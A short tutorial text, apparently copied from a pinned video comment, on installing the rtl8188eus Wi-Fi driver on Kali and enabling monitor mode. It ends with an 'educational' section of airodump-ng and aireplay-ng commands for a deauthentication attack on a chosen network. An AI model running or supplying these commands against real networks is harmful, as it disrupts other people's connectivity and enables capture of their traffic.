-
Notifications
You must be signed in to change notification settings - Fork 0
/
Text File
74 lines (37 loc) · 1.25 KB
/
Text File
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
Techie Singh
Pinned by Techie Singh
Techie Singh
5 months ago (edited)
If u find any problems while executing the commands... Please feel free to contact me on instagram with screenshots I will help you out 😊
commands
sudo apt update
sudo apt install bc
sudo rmmod r8188eu.ko
git clone https://github.com/aircrack-ng/rtl8188eus
cd rtl8188eus
sudo -i
echo "blacklist r8188eu" > "/etc/modprobe.d/realtek.conf"
exit
make
sudo make install
sudo modprobe 8188eu
To enable Monitor mode
ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig \\check mode: monitor
Deauthentication Attack[for educational purpose only]
airodump-ng wlan0
airodump-ng --bssid <id> --channel <ch> --write test wlan0
aireplay-ng --deauth [any no.] -a <bssid> -c <station id> wlan0
Important note:
If after restarting your kali machine doesn't recognise your device..
As lot of people are facing the same problem ..
I have a solution for you..
Whenever you restart your kali OS
Insert the adapter and run the command
sudo rmmod r8188eu.ko
sudo modprobe 8188eu
Disconnect the device and connect again..
Then check.